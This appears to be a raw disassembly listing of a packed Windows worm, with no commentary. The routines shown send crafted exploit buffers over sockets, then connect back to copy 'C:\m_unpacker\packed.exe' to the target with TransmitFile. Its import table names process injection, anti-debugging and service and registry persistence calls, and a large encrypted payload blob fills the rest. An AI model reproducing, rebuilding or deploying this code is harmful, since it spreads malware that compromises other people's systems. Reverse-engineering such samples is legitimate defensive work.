call dword_40112C ; connect
push 89h
push offset dword_4020B8
push [ebp+var_8]
call sub_4059B4
push 0A8h
push offset dword_402148
push [ebp+var_8]
call sub_4059B4
push 0DEh
push offset dword_4021F8
push [ebp+var_8]
call sub_4059B4
mov [ebp+var_20], al
cmp [ebp+var_20], 30h
jz short loc_405904
cmp [ebp+var_20], 31h
jz short loc_4058FB
jmp short loc_40590A
; ---------------------------------------------------------------------------
loc_4058FB: ; CODE XREF: sub_40587E+79�j
mov [ebp+var_C], 1
jmp short loc_40591A
; ---------------------------------------------------------------------------
loc_405904: ; CODE XREF: sub_40587E+73�j
and [ebp+var_C], 0
jmp short loc_40591A
; ---------------------------------------------------------------------------
loc_40590A: ; CODE XREF: sub_40587E+7B�j
push [ebp+var_8]
call dword_401140 ; closesocket
xor eax, eax
jmp locret_4059B0
; ---------------------------------------------------------------------------
loc_40591A: ; CODE XREF: sub_40587E+84�j
; sub_40587E+8A�j
push 3Eh
push offset dword_4022D8
push [ebp+var_8]
call sub_4059B4
push 60h
push offset dword_402318
push [ebp+var_8]
call sub_4059B4
push 0A0h
push offset dword_402380
push [ebp+var_8]
call sub_4059B4
call dword_4010A4 ; GetTickCount
and eax, 0FFFFh
mov word ptr [ebp+var_4], ax
cmp [ebp+var_C], 1
jnz short loc_40596C
push [ebp+var_4]
push [ebp+var_8]
call sub_4059EF
jmp short loc_405977
; ---------------------------------------------------------------------------
loc_40596C: ; CODE XREF: sub_40587E+DF�j
push [ebp+var_4]
push [ebp+var_8]
call sub_405AE6
loc_405977: ; CODE XREF: sub_40587E+EC�j
push 800h
call dword_4010DC ; Sleep
push [ebp+var_8]
call dword_401140 ; closesocket
push [ebp+var_4]
push [ebp+arg_0]
call sub_405BB6
test eax, eax
jnz short loc_4059A0
xor eax, eax
jmp short locret_4059B0
; ---------------------------------------------------------------------------
dw 10EBh
; ---------------------------------------------------------------------------
loc_4059A0: ; CODE XREF: sub_40587E+11A�j
cmp [ebp+var_C], 1
jnz short loc_4059AD
xor eax, eax
inc eax
jmp short locret_4059B0
; ---------------------------------------------------------------------------
db 0EBh
db 3
; ---------------------------------------------------------------------------
loc_4059AD: ; CODE XREF: sub_40587E+126�j
push 2
pop eax
locret_4059B0: ; CODE XREF: sub_40587E+97�j
; sub_40587E+11E�j ...
leave
retn 4
sub_40587E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059B4 proc near ; CODE XREF: sub_40587E+43�p
; sub_40587E+55�p ...
var_600 = byte ptr -600h
var_5BC = byte ptr -5BCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 600h
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_401130 ; send
push 0
push 600h
lea eax, [ebp+var_600]
push eax
push [ebp+arg_0]
call dword_40113C ; recv
mov al, [ebp+var_5BC]
leave
retn 0Ch
sub_4059B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059EF proc near ; CODE XREF: sub_40587E+E7�p
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_2F2 = byte ptr -2F2h
var_2E = byte ptr -2Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 37Ch
push 86h
push offset dword_402428
lea eax, [ebp+var_378]
push eax
call sub_40392B
lea eax, [ebp+var_2F2]
mov [ebp+var_4], eax
push dword_401F2C
push offset dword_401F30
push [ebp+var_4]
call sub_40392B
mov eax, [ebp+var_4]
mov cx, [ebp+arg_4]
mov [eax+100h], cx
push 41h
mov eax, 264h
sub eax, dword_401F2C
add eax, 60h
push eax
mov eax, [ebp+var_4]
add eax, dword_401F2C
push eax
call sub_403901
mov eax, [ebp+var_4]
add eax, 264h
mov [ebp+var_37C], eax
mov eax, [ebp+var_37C]
mov dword ptr [eax], 2080Ah
mov eax, [ebp+var_37C]
mov dword ptr [eax+0Ch], 20804h
mov eax, [ebp+var_37C]
mov dword ptr [eax+30h], 20804h
mov eax, [ebp+var_37C]
mov dword ptr [eax+3Ch], 20804h
push 20h
push offset dword_4024B0
lea eax, [ebp+var_2E]
push eax
call sub_40392B
push 0
push 36Ah
lea eax, [ebp+var_378]
push eax
push [ebp+arg_0]
call dword_401130 ; send
push 400h
call dword_4010DC ; Sleep
push 0
push 36Ah
lea eax, [ebp+var_378]
push eax
push [ebp+arg_0]
call dword_401130 ; send
leave
retn 8
sub_4059EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405AE6 proc near ; CODE XREF: sub_40587E+F4�p
var_4DC = dword ptr -4DCh
var_4D8 = byte ptr -4D8h
var_452 = byte ptr -452h
var_2A = byte ptr -2Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4DCh
push 86h
push offset dword_4024D8
lea eax, [ebp+var_4D8]
push eax
call sub_40392B
lea eax, [ebp+var_452]
mov [ebp+var_4DC], eax
push 90h
mov eax, 3E8h
sub eax, dword_401F28
push eax
push [ebp+var_4DC]
call sub_403901
mov eax, 3E8h
sub eax, dword_401F28
add eax, [ebp+var_4DC]
mov [ebp+var_4], eax
push dword_401F28
push offset dword_401D90
push [ebp+var_4]
call sub_40392B
mov eax, [ebp+var_4]
mov cx, [ebp+arg_4]
mov [eax+104h], cx
and [ebp+var_8], 0
jmp short loc_405B6F
; ---------------------------------------------------------------------------
loc_405B68: ; CODE XREF: sub_405AE6+A3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_405B6F: ; CODE XREF: sub_405AE6+80�j
cmp [ebp+var_8], 10h
jnb short loc_405B8B
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4DC]
mov dword ptr [ecx+eax*4+3E8h], 20804h
jmp short loc_405B68
; ---------------------------------------------------------------------------
loc_405B8B: ; CODE XREF: sub_405AE6+8D�j
push 20h
push offset dword_402560
lea eax, [ebp+var_2A]
push eax
call sub_40392B
push 0
push 4CEh
lea eax, [ebp+var_4D8]
push eax
push [ebp+arg_0]
call dword_401130 ; send
leave
retn 8
sub_405AE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405BB6 proc near ; CODE XREF: sub_40587E+113�p
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_1C], 2
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
mov ax, [ebp+arg_4]
mov [ebp+var_1A], ax
push 6
push 1
push 2
call dword_401160 ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push eax
push [ebp+var_4]
call dword_40112C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_405C00
push [ebp+var_4]
call dword_401140 ; closesocket
xor eax, eax
jmp short locret_405C4A
; ---------------------------------------------------------------------------
loc_405C00: ; CODE XREF: sub_405BB6+3B�j
push 0
push 8000080h
push 3
push 0
push 1
push 1
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
call dword_401098 ; CreateFileA
mov [ebp+var_8], eax
push 1
push 0
push 0
push 0
push 0
push [ebp+var_8]
push [ebp+var_4]
call sub_405C54
mov [ebp+var_C], eax
push [ebp+var_8]
call dword_40105C ; CloseHandle
push [ebp+var_4]
call dword_401140 ; closesocket
mov eax, [ebp+var_C]
locret_405C4A: ; CODE XREF: sub_405BB6+48�j
leave
retn 8
sub_405BB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405C4E proc near ; CODE XREF: sub_403B95+247�p
; sub_403B95+261�p
jmp dword_40115C
sub_405C4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405C54 proc near ; CODE XREF: sub_405BB6+77�p
jmp dword_4010E4
sub_405C54 endp
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 3B7h dup(0)
dword_406B38 dd 40104400h, 52454B00h, 334C454Eh, 6C642E32h, 4780006Ch
; DATA XREF: __u_____:00409348�o
dd 75437465h, 6E657272h, 6F725074h, 73736563h, 72438000h
dd 65746165h, 6F6D6552h, 68546574h, 64616572h, 72578000h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 69568000h
dd 61757472h, 6C6C416Ch, 7845636Fh, 75448000h, 63696C70h
dd 48657461h, 6C646E61h, 44800065h, 74656C65h, 6C694665h
dd 80004165h, 736F6C43h, 6E614865h, 656C64h, 69615780h
dd 726F4674h, 676E6953h, 624F656Ch, 7463656Ah, 65478000h
dd 6F725074h, 64644163h, 73736572h, 6F4C8000h, 694C6461h
dd 72617262h, 80004179h, 43746547h, 65727275h, 6854746Eh
dd 64616572h, 80006449h, 57746547h, 6F646E69h, 69447377h
dd 74636572h, 4179726Fh, 736C8000h, 656C7274h, 8000416Eh
dd 4C746547h, 6369676Fh, 72446C61h, 53657669h, 6E697274h
dd 417367h, 6E694680h, 6F6C4364h, 80006573h, 646E6946h
dd 7478654Eh, 656C6946h, 46800041h, 46646E69h, 74737269h
dd 656C6946h, 45800041h, 6E617078h, 766E4564h, 6E6F7269h
dd 746E656Dh, 69727453h, 4173676Eh, 6C478000h, 6C61626Fh
dd 65657246h, 6C478000h, 6C61626Fh, 6F6C6C41h, 47800063h
dd 65547465h, 6946706Dh, 614E656Ch, 41656Dh, 65724380h
dd 46657461h, 41656C69h, 6C5F8000h, 61657263h, 5F800074h
dd 6F6C636Ch, 80006573h, 54746547h, 436B6369h, 746E756Fh
dd 72438000h, 65746165h, 636F7250h, 41737365h, 736C8000h
dd 6D637274h, 80004170h, 65447349h, 67677562h, 72507265h
dd 6E657365h, 43800074h, 74616572h, 72685465h, 646165h
dd 74654780h, 75646F4Dh, 6946656Ch, 614E656Ch, 41656Dh
dd 74736C80h, 79706372h, 8000416Eh, 53746547h, 65747379h
dd 7269446Dh, 6F746365h, 417972h, 74655380h, 656C6946h
dd 72747441h, 74756269h, 417365h, 706F4380h, 6C694679h
dd 80004165h, 61657243h, 754D6574h, 41786574h, 65478000h
dd 73614C74h, 72724574h, 8000726Fh, 74697845h, 636F7250h
dd 737365h, 74654780h, 76697244h, 70795465h, 80004165h
dd 65656C53h, 0FFFF0070h, 10ECFFFFh, 53550040h, 32335245h
dd 6C6C642Eh, 69468000h, 6957646Eh, 776F646Eh, 43800041h
dd 55726168h, 72657070h, 46800041h, 57646E69h, 6F646E69h
dd 41784577h, 65478000h, 6E695774h, 54776F64h, 61657268h
dd 6F725064h, 73736563h, 80006449h, 646E6553h, 7373654Dh
dd 41656761h, 65478000h, 6E654D74h, 77800075h, 69727073h
dd 4166746Eh, 0FFFFFF00h, 40110CFFh, 32535700h, 2E32335Fh
dd 6C6C64h, 8000000h, 13000000h, 0E000000h, 41535780h
dd 74636F49h, 6Ch, 0A00h, 57803300h, 6F534153h, 74656B63h
dd 41h, 1400h, 300h, 1200h, 500h, 1100h, 0F00h, 200h, 7200h
dd 100h, 0C00h, 0
dd 900h, 700h, 9600h, 1600h, 0FFFF0B00h, 1000FFFFh, 44410040h
dd 49504156h, 642E3233h, 80006C6Ch
aStartservicect db 'StartServiceCtrlDispatcherA',0
aAopenservicea db '€OpenServiceA',0
aAopenscmanager db '€OpenSCManagerA',0
aAcloseserviceh db '€CloseServiceHandle',0
aAdeleteservice db '€DeleteService',0
aAsetservicesta db '€SetServiceStatus',0
aAregisterservi db '€RegisterServiceCtrlHandlerA',0
aAchangeservice db '€ChangeServiceConfigA',0
aAcontrolservic db '€ControlService',0
aAregclosekey db '€RegCloseKey',0
aAchangeservi_0 db '€ChangeServiceConfig2A',0
aAregsetvalueex db '€RegSetValueExA',0
aAregcreatekeya db '€RegCreateKeyA',0
aAsetsecurityin db '€SetSecurityInfo',0
aAstartservicea db '€StartServiceA',0
aAcreateservice db '€CreateServiceA',0
db 3 dup(0FFh)
dd 4010E4FFh, 57534D00h, 4B434F53h, 6C6C642Eh, 72548000h
dd 6D736E61h, 69467469h, 8000656Ch, 0
MEW ends
; Section 2. (virtual address 00007000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00007000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
__u_____ segment para public 'BSS' use32
assume cs:__u_____
;org 407000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
dword_407000 dd 0FF41C933h, 0FFC91313h, 0C3F87213h, 7C801D77h, 7C80ADA0h
; DATA XREF: __u_____:00407018�o
dd 0
dd offset dword_407000
dd 400130h, 401690h, 401180h, 0F501A5B0h, 9D5B0856h, 0AB24FD8h
dd 1F08054Eh, 23609A0Ah, 7180C3Ah, 9A6B0DAh, 0D7E5834h
dd 4B1380Ah, 80BA0E56h, 0B9034011h, 2870510h, 1F0E0FE8h
dd 1F16B7CCh, 684540A5h, 14259C30h, 7B03280h, 0C2FAE242h
dd 95E00E08h, 8882819Eh, 0EECC331h, 80DA8486h, 0D9DED24Ch
dd 74D8F8C5h, 0CFD5FADFh, 0D32FC40Ah, 0E1B0DD27h, 8323F691h
dd 0D7C0C930h, 0D123FFC7h, 0DF023ADCh, 0D018DEAAh, 933E1802h
dd 37381BDh, 84C4C2D5h, 0DCDC0DDh, 9EFB9C40h, 9AC09D26h
dd 0DDD4D191h, 0ABF0F4D9h, 0C7311E06h, 0D5C28ED7h, 9E8F0895h
dd 14B4C86Fh, 441FE7A3h, 0C347DFD4h, 0DDFF790h, 0C3D716C5h
dd 39C6F3F1h, 0D7B3C4C8h, 3E1EE214h, 0C29FC3D9h, 0DF3EF6BEh
dd 0CEE3B3DEh, 0ACD3F3C6h, 1BF52C98h, 7AC5C3DEh, 0D8C4681Bh
dd 8FC9AA3Ah, 94A89EB0h, 0E5FFC078h, 0BEFDF5D6h, 0C36DFB48h
dd 58192E12h, 0D7A986BDh, 0D4B0B35Bh, 55ADC2FAh, 9EDBFB9Ah
dd 6CDCA878h, 6FD73273h, 2CF88272h, 0DC51D2D1h, 67AAB70Dh
dd 0AF4F6FDAh, 6DF494C7h, 6CDFDE69h, 0C92E3AA4h, 15DD79CDh
dd 365C0EB6h, 9EC9F4F1h, 0FE7B90A4h, 90FBF312h, 1F824608h
dd 0AAE5D4BAh, 0DC29E23Eh, 39673F02h, 0E6D9E0E0h, 0F763E3FDh
dd 3086813Fh, 840E8AB0h, 4FDC8088h, 0D9FFFA42h, 2D159AFEh
dd 3C115906h, 0E4D5FFF8h, 0E3801258h, 0AB83A3DFh, 81087582h
dd 990AB284h, 101413F9h, 3151FEDFh, 0BDC34085h, 42F96453h
dd 0EB248820h, 0EDD38C5Ah, 0CA598CAh, 0D8949990h, 206CA77Ah
dd 0C13F842Ch, 0D9E5E17Ch, 10A9DAE4h, 808E0A0Eh, 3C1CC88Ah
dd 9D9CD8A4h, 7AD31CD4h, 902CA4FAh, 0D2ECFD24h, 0CD762C5h
dd 5F41C0D3h, 319EC9DDh, 28AAF208h, 57C79869h, 20F3C0ECh
dd 0BCE5D30Ch, 80DDA45Ch, 33C7D253h, 223E7DD7h, 32EC243Ah
dd 0E75822B6h, 0F92883B7h, 0A45FC90Eh, 1FD6BB70h, 9DE94C43h
dd 26F4DD1Ah, 8C024A66h, 0F6C5AC19h, 0BEC648DFh, 0B244F771h
dd 98DE1878h, 69D6F2D5h, 612F61C9h, 2138C62Dh, 0B2A1DE8h
dd 0D02D4614h, 8F39B498h, 0C5A6EFD7h, 43FCA26Ch, 4B4C4976h
dd 52FF796Fh, 0C73431DFh, 0B3025DBh, 9A474810h, 6F374C43h
dd 65FA6DECh, 866AC43h, 0D238DC94h, 1F677494h, 1CFEB4ECh
dd 282FE9D3h, 0FF74DF02h, 4DB5D07Bh, 0AA5C8B6Dh, 6EC53E48h
dd 9C94DDC9h, 0B0949E1Dh, 28A3B918h, 0B1B5268h, 0B07ACE64h
dd 0CD947C55h, 0E043C94Ch, 551169B7h, 0C82841DEh, 36EEEFC0h
dd 65B266E5h, 0A206F402h, 36D4DCF6h, 48F8E2D8h, 31F3AA89h
dd 1986F223h, 60F530D4h, 22EF9E49h, 0D6EB12C8h, 9298AD54h
dd 85827221h, 0D936D31h, 0B0690A84h, 37D0EE0Dh, 5BFF69ECh
dd 18064309h, 92BC9A3Eh, 0C0E18FD5h, 0D0E35B21h, 0D0E19F90h
dd 0DE13CD91h, 92AE368Ah, 0BE69F0A2h, 0BEC5F5EBh, 0ED075140h
dd 0DBF094C0h, 150D42D6h, 1A07F2FDh, 0CC1E9FFBh, 3FF0391Dh
dd 0C138EB2Ah, 9DC5D87Ch, 940B5D8Eh, 9D6C924Eh, 0F9907CECh
dd 0F99A931Ch, 0E0655F6Fh, 8FB083F5h, 0FA41873h, 0E3F1FCE7h
dd 0CB0D47E3h, 3846901Bh, 8A0C660Ch, 8AD45114h, 8E50AB06h
dd 0CFC54C10h, 480C1F68h, 430CA1B0h, 2DEDD1D3h, 1A835628h
dd 101A0282h, 4DC23F6Ah, 0D56E1032h, 33721FDAh, 9ED6D734h
dd 0CAF69A16h, 5918932Bh, 0F26221EBh, 0E399A4C4h, 1018E839h
dd 8DF064D2h, 34991524h, 560A56A5h, 0DFE00A7Bh, 85E0680Ah
dd 82F4FCE2h, 0D650DE58h, 24E4D43Ch, 0F19AB4F6h, 0FC3C4328h
dd 4CDE4EC2h, 0F9FE2ECCh, 528C2CD8h, 44CC0C9Ah, 0CEF39271h
dd 39370AAFh, 0FF3842BBh, 0EF0994EFh, 0C20527FFh, 3FC7E464h
dd 0CA93CA1Fh, 8055871Ch, 8EE3C914h, 460B53B5h, 196132FEh
dd 0A334F914h, 75C44DF2h, 32C2F126h, 10C2F35Ch, 0F2EE7AC4h
dd 0E74C09A4h, 98174352h, 0DCFDF948h, 0BF9DEE62h, 6F98D7A6h
dd 4E9097F2h, 0C013906Ah, 5F4F7431h, 5BF4CCE5h, 0DB1BB272h
dd 0E8124958h, 7E6E5E3h, 94DC3BE7h, 8CF543A8h, 0C8B5E4B8h
dd 0B165B33Eh, 90EA18FAh, 3D536DE0h, 84BEF982h, 83450EF8h
dd 70604C4Fh, 0C4748A1Ch, 7F71B70Fh, 5B48E0BDh, 0DCC8B42h
dd 51C5A494h, 0D607DA48h, 20FBBC63h, 0B4FCAC12h, 0A87554CDh
dd 0EEEF5280h, 0F439EBEDh, 5D1E946Eh, 0BEB80F33h, 74333B17h
dd 0DAEE7381h, 0F5D4E980h, 0BCEBFCA9h, 0FAC06CFh, 0B8CB41ABh
dd 10B95C33h, 0D8E060E2h, 397441C4h, 80E7A43Ch, 583AF95Ah
dd 74DA664Fh, 0EEC57DB6h, 0F5391860h, 3A6B24B4h, 0C8599320h
dd 3E02BC16h, 5CBEFEh, 9D67983h, 0E17E7D90h, 858EEFA2h
dd 0A4F51DB7h, 3B543043h, 6F6E368h, 57A8A914h, 16A03729h
dd 9476C983h, 0DE00A822h, 0A3F99FBBh, 0A2B19351h, 0B85286B2h
dd 802CCDFh, 0B41D9718h, 877D4430h, 0A0DA743Bh, 0C1B8DAFCh
dd 0C0AA1452h, 63460677h, 9E1D17E8h, 3132E76Dh, 206120B4h
dd 36F95521h, 7D3B08E5h, 0E18FCFFDh, 81A8E564h, 14E4C47h
dd 92476C3Bh, 6AFE01E7h, 0E5002FE3h, 0CE7035A0h, 19E064BAh
dd 5BBC02B4h, 0A814A555h, 0FCEBBB01h, 7BB46DAAh, 0DE51512Ch
dd 4E282660h, 6089BE3Ah, 7E5F1482h, 0B010D050h, 1A209E27h
dd 0A0940832h, 0A2B71CA2h, 0D43207FBh, 0EE80F0B3h, 0C0A10372h
dd 0C8B81DACh, 9C93EEB8h, 0ECB0107Fh, 423F87B0h, 1D422D9Bh
dd 9A98521Dh, 90919581h, 8B4EADB0h, 350162A4h, 0F2FD7B40h
dd 20AC251h, 92DB78B1h, 0A74E4F62h, 0B2F0D207h, 290F3E0h
dd 0E7E4F5FEh, 0EE3E2FFh, 0F7CE4EDFh, 81FDF1E7h, 9E809E81h
dd 0FE5EFC30h, 0B5306B4h, 0B4D66FDCh, 8633E4Ch, 0E3BFD7DBh
dd 1E2EC0C5h, 0D1192083h, 4887FD51h, 1E80E882h, 769F3395h
dd 0E4F2162Eh, 6D32906Eh, 96FA1680h, 90145275h, 0B790C321h
dd 0BCFEA0BCh, 8A48BFEFh, 15BAA1B4h, 6489065h, 0D9300F64h
dd 0A038A2FBh, 10E0AFE3h, 2F322703h, 641550B8h, 4AF5E71Fh
dd 0FBD46383h, 0FBC7FBDFh, 0F27765C3h, 0A025080h, 0FC899140h
dd 0EC24AD85h, 10D19E3Ch, 0BD6AE253h, 90B888B0h, 0E73C6A44h
dd 0B22F9085h, 5B126B3h, 2924F653h, 0F09008F7h, 28FFB6F3h
dd 55FEA067h, 3AA50320h, 0FBF85038h, 0F4F2FFh, 0CADAA931h
dd 0F9544200h, 801F98ACh, 0A0C40A95h, 5FE6E3D7h, 0E0228A65h
dd 90B118C5h, 0BA08088Fh, 88F68009h, 0BEA00D67h, 0C9ECBF40h
dd 2C87F902h, 1F8FF594h, 0EC94E101h, 0D0122140h, 0B4416CB8h
dd 38A8D303h, 12EF6E80h, 6117A6EAh, 4FB2B12Fh, 0B2B32F27h
dd 3FD12D4h, 26B9B31Ah, 1285F2A8h, 388FC4E7h, 68A12C27h
dd 0A4882395h, 2FE06849h, 0FF8EA37h, 8D1CD33Eh, 33D329E4h
dd 0E9C196AFh, 0E6EC463Fh, 7F09F950h, 1F53F5F5h, 0B3BBF1B5h
dd 737271B4h, 4EE0884h, 6E874BEh, 82FF7800h, 7FA6C0FBh
dd 0C8A20063h, 0DE0FF7EAh, 0ACA43851h, 80EDB43Bh, 79AC5B3Ah
dd 0A0582FA1h, 2BA09BD4h, 0E5CED0F8h, 4AA839D6h, 0B3208410h
dd 0C38CAD06h, 0B412AC61h, 1C4E4F50h, 4A29FA37h, 0A293E7A8h
dd 6641E0ECh, 1FFDD7F5h, 5EB4A19Eh, 0A7B42522h, 91D0AF08h
dd 0A43458F2h, 33AA87A2h, 69CDD302h, 67029A08h, 58263C3Dh
dd 0B4AC327Bh, 0E1B07A56h, 7901B178h, 0B43011CCh, 14289A0Bh
dd 8F377AB0h, 0C7B43088h, 3C088D8h, 851331C2h, 0B4B2A542h
dd 0D1A9B208h, 8900D09h, 350B5B32h, 0EB2F7396h, 59E396D5h
dd 62749182h
dd 0C0C808DBh, 5C3BE500h, 0E6A0E433h, 1F407FD5h, 1344F577h
dd 16471998h, 4C099F48h, 852158CDh, 84402884h, 88191FA7h
dd 0E0003D19h, 698A54Fh, 70351EC0h, 6E58B5C5h, 0A6AAABC7h
dd 6B41105h, 73797083h, 62E16197h, 4A6204Ch, 0FE310D4Fh
dd 0D833B0EAh, 64DA8390h, 317C7805h, 1491BDC4h, 78D1860h
dd 0A1B8C571h, 58106419h, 0C9C4BE05h, 0C2A0C035h, 0B1D836E0h
dd 0F4222E73h, 0F72264A1h, 98DFC9D8h, 5B4F6C20h, 0A269A45Eh
dd 305C061Eh, 7030C845h, 0CE98B4BDh, 8A51027h, 8C1A8111h
dd 0A330DB4h, 90DAA074h, 0DA166D10h, 0B75BDD98h, 0EDA93B51h
dd 0BE08BE39h, 94B5B9CDh, 0C53ADA95h, 250AA450h, 0B2C1A778h
dd 0F090BD5Bh, 587EB0A4h, 346791BBh, 0B8FB0430h, 0C8E211A1h
dd 0A2DA8A98h, 59B8C4DFh, 0BAFF58A6h, 3D3444D8h, 8055C54Fh
dd 73501313h, 3200B8CCh, 0DA812535h, 722C02BAh, 0A0F2B213h
dd 0A259CAA4h, 8C687A7Ah, 0F4533D71h, 68530D65h, 6CB71343h
dd 445C0922h, 9B924440h, 3D174850h, 63C73CD1h, 64E05C0Ch
dd 8506C94h, 81B8A098h, 93A8C053h, 64684251h, 0D500C2Eh
dd 7545E99h, 0B4B11038h, 0D08BF34h, 385FAB88h, 486DD8A6h
dd 544CD1D8h, 0DA9E7712h, 0B94851DBh, 28EEC118h, 0C8BC9009h
dd 5058C24Ch, 0AEB4F4EAh, 51245FAAh, 83456508h, 14193076h
dd 0BA98F42Ah, 0A01C63A6h, 0A1B57780h, 84F6F40Bh, 31489C0Ah
dd 9533D683h, 4D164380h, 0D5133F57h, 4572898h, 1A46ED89h
dd 0BB26E116h, 1FB55548h, 58C1E465h, 7226ED51h, 2C9EFB4h
dd 45987C0Eh, 0A8A50969h, 54796614h, 0CF0E488Bh, 259469D4h
dd 0A4C81694h, 4D9C5887h, 7279A2CFh, 484188B8h, 0F408FD6Ah
dd 875809B5h, 8D630DAFh, 482AA220h, 0C528A378h, 0C81B6A8h
dd 11D61050h, 1306A044h, 5B21CF24h, 2433305Ah, 626C3021h
dd 168C854Fh, 0A14090C8h, 54352439h, 0D338A9Fh, 0B5923006h
dd 0B1BAA659h, 0A23CF980h, 6411189h, 0B953813h, 5B4F253Bh
dd 651016A4h, 0D61D4A78h, 0F74D977h, 0A6B3B6B2h, 762CC8B3h
dd 0A558B0A7h, 13B5C3D0h, 89ADA46Ch, 163122CCh, 0C927B4DAh
dd 62D8B863h, 0A46CFFCBh, 82149811h, 48A53DB8h, 9C1562E0h
dd 698A16Ch, 0D7A8BC3Fh, 1A80222Ah, 91BA5658h, 0A4284682h
dd 17521825h, 0DD0B5F10h, 345BEC7Eh, 0C17EB1A2h, 267813BCh
dd 108534F8h, 4D2D1B64h, 99A03264h, 0E0ABBBC8h, 4A84E480h
dd 1361E23Bh, 0B866A464h, 58152474h, 700E4C1Dh, 0A1314A45h
dd 98093EA0h, 11078AC9h, 82F28B0Dh, 93A9C323h, 0FB34B30Eh
dd 8B1F145Ch, 0C51753B5h, 7C5182B2h, 0C524279Ch, 8206F99h
dd 90C3F014h, 29BDCA30h, 363C390Ah, 0A224D5BEh, 0E2B007BCh
dd 1138C506h, 983BA7B8h, 8353D046h, 3D156C21h, 89E0260Dh
dd 6927754Fh, 0F948A817h, 879F8949h, 4448F7F3h, 9B56E408h
dd 0F248E1AAh, 0B52B343Dh, 8C44E550h, 1C475653h, 0CFA4FE22h
dd 61A71BF3h, 22B34B34h, 2E0920DDh, 0CA07B9A0h, 68E764F4h
dd 0EBF0906h, 21D2E991h, 4105ED9Eh, 0E542580Fh, 449190B0h
dd 6FC4F073h, 762D74AEh, 0AC1A0C1Eh, 0F04454A8h, 5B3F48E3h
dd 8A869C53h, 6BA1129Bh, 30E0F00Ah, 0A64F6B48h, 39A3C258h
dd 2124B65Bh, 0A0CD977h, 0DEF8C79h, 1AFD36F6h, 427C0C88h
dd 6A59AC0Ch, 53311326h, 7D6157A4h, 9806B2B4h, 484ACA90h
dd 0A8ACF144h, 0BB78BC10h, 0CCF82EEEh, 4D414C86h, 88059252h
dd 1EC91E08h, 13795C7Dh, 24194A2h, 405325B8h, 9EC58AB5h
dd 1B9417D2h, 0CA90E185h, 91BC2A58h, 93A46958h, 9B5D5520h
dd 244B7A0Dh, 4D20BA5Bh, 3119A065h, 0D94358EAh, 1A7ED153h
dd 63EF59B7h, 172030ADh, 5CBD6833h, 0FFA83694h, 1C828154h
dd 89CD4C38h, 0C02A961Ah, 59C6373Fh, 0D871B5B5h, 71244BADh
dd 512A261Ah, 96CD9422h, 0C1A9C415h, 93A0D813h, 2FB665C0h
dd 91829190h, 0AB2205C5h, 0E2158FEh, 735C10BBh, 9EEB58CAh
dd 57F7C53Ch, 0B729080Fh, 663EB612h, 18A48CFAh, 6ABD06C4h
dd 718B6D90h, 9ABE51C5h, 28812004h, 0AD12B231h, 186B1FB9h
dd 847DB8BCh, 59D2441Fh, 0D80BE962h, 17F7BED4h, 378D33EBh
dd 58FD90DCh, 50B9B626h, 5C590977h, 22D06B69h, 963EA219h
dd 0BA7821F6h, 4EAC13Bh, 0FA621EB9h, 29DB905Bh, 3E21B105h
dd 0C817437Dh, 4E0FEDE5h, 0D5124217h, 2258F211h, 0E433B1C0h
dd 0E11F402Eh, 0A4F85988h, 0A2EC42A4h, 10152A28h, 3B1A9938h
dd 22D5DA13h, 5419A7B1h, 0DE103807h, 27ED8B79h, 4D58F1AAh
dd 5F3809B9h, 34B6C486h, 6CF562F3h, 40ACA22Eh, 684A13A1h
dd 68D344Ah, 4A9D2833h, 0F565612Fh, 0C05EB96Ch, 0B6CC83A9h
dd 772A4446h, 2278B551h, 42D3481Ch, 2258860Ch, 2A5931F9h
dd 4AE8D815h, 6A3488AEh, 66CBC6C3h, 0B6581DF3h, 0D8F887F8h
dd 82A67B4Ch, 8457C966h, 0FCA0883Bh, 8F73794Eh, 6413C490h
dd 50F8C1C7h, 404A394Bh, 0BF2DD106h, 0D79283Fh, 0B2D534C1h
dd 0CFF90A0Ah, 2C6C09F6h, 0F3998521h, 200BCA1Ah, 0B30F21F4h
dd 0D708F544h, 6503F659h, 67594F15h, 15FCC812h, 0E1C83917h
dd 0CD766F15h, 0D1C35E2h, 427581E3h, 14162E39h, 9E3CFDCh
dd 72D536DBh, 6602D342h, 0D54014B1h, 401AAEBBh, 0DAEE0D6h
dd 0AE94D840h, 1AD9664Ah, 592B698Eh, 0DE9012F2h, 902CD12Bh
dd 64A121C1h, 1AAE0AC3h, 1B0AC5E4h, 4AB91139h, 0D8B5CC02h
dd 0CBF3730Ch, 58187E9Eh, 5964456Bh, 6EB2496Eh, 82B1F0C5h
dd 0F619017h, 94211670h, 0A5449867h, 486D1533h, 4CDDBE0Dh
